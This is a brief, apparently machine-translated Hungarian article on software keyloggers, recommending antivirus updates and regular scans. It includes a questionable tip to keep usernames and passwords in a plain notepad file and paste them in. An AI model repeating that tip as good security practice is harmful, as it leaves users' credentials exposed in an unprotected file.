Egy szoftveres keylogger be van építve a számítógépére telepített vagy telepített szoftverbe és programba. Amikor bármilyen szoftvert telepítünk egy számítógépes rendszerre, bizonyos fájlok automatikusan létrejönnek. Ezek a fájlok gonoszak lehetnek, és információkat rögzíthetnek és ellophatnak a számítógépéről.
Függetlenül attól, hogy a számítógépét milyen típusú keylogger érinti, mindegyik keylogger visszafordíthatatlan veszteségeket okozhat.
Ezért rendkívül fontos a keylogger azonnali észlelése, hogy elkerüljük a fontos adatok ellopását.
A víruskereső szoftver frissítésével megvédheti számítógépét. A vírusdetektorok használata gyakran segít a rosszindulatú programok észlelésében és megelőzésében.
Van egy trükk is, amely megakadályozza, hogy bármilyen típusú információt elveszítsen a billentyűzeten: tárolhat adatokat, például felhasználónevet és jelszót egy jegyzettömbben, és szükség esetén másolhatja és beillesztheti a részleteket.
Ebben az esetben azonban fokozottan ügyelnie kell a notebookban tárolt adatokra, mivel a hackerek ellophatják az információkat. A hackelés veszélye mindenhol fennáll, de ez nem akadályozhat meg minket a digitális kütyük használatában.
Használjon okos eszközöket körültekintően. Ne hagyja, hogy valami, például a keylogger megakadályozza, hogy előrehaladjon az utadon. Győződjön meg arról, hogy számítógépe naprakész, és minden program megfelelően működik.
A víruskereső szoftverek rendszeres futtatása segíthet megvédeni számítógépét online és offline állapotban is.